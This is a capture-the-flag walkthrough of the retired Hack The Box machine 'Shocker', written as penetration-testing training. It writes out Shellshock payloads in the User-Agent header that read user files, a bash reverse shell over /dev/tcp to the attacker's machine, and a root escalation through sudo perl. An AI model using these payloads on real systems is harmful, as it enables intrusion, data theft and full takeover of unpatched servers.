HTB Walkthrough: Shocker (retired)

Shocker is a retired box on HTB. It comes under TJ Null’s OSCP-like boxes.

Hostname: Shocker | Difficulty Level: Easy | Operating System: Linux

NMAP scan

We can see port 80 and port 2222 open.

There were multiple rabbit holes such as bug.jpg image (use ‘steghide’ tool on it), vulnerabilities of OpenSSH 7.2p2 (use ‘searchsploit’). There are other approaches as well to exploit this machine such as NSE script, etc. (refer IPPSec’s video).

Since, Apache is hosted on webserver, we should be using dirb wordlist along with gobuster for further enumeration.

Running gobuster to enumerate port 80

CGI scripting is usually used by Apache when it needs to transfer something to different languages such as bash. Running gobuster again on ‘/cgi-bin’ to look for file with extensions (-x flag) such as .sh, .pl.

Running gobuster to enumerate /cgi-bin

The name of the machine is ‘Shocker’ and it has CGI script running, check if machine is vulnerable for ShellShock. To confirm if the machine is vulnerable to shell-shock, modify ‘User-Agent’ in HTTP request as below:

With above, you will see /etc/passwd file as a response. From that, you can find out that a user named ‘shelly’ exists and the respective home directory.

A simpler way to get user.txt file is using below:

User-Agent: () { :;}; echo “NS:” $(</home/shelly/user.txt)

You will get the user flag in ‘NS’ field of the response. Unfortunately, root flag cannot be achieved via same method. (Note: It is possible for user.txt not to be in /home/shelly directory). Let us try to get a reverse shell.

Exploitation

After some trial and error, the vulnerability is exploited after using ‘echo’ in the User-Agent string. This can be confirmed by playing around with below User-Agent string:

User-Agent: () { :;}; echo; /bin/bash -c ‘ping -c 3 10.10.10.56’

Set up a netcat listener on kali port (e.g. 9876). You will get a user reverse shell using below User-Agent:

User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/<Kali IP>/9876 0>&1

Burpsuite request for reverse shell

Privilege Escalation

Check sudo privileges.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

Google search for “perl privilege escalation” for perl script. Executing below on target machine:

shelly@Shocker:/$ sudo perl -e ‘exec “/bin/bash”;’

Using above sudo exploit, you will get root privilege and root flag.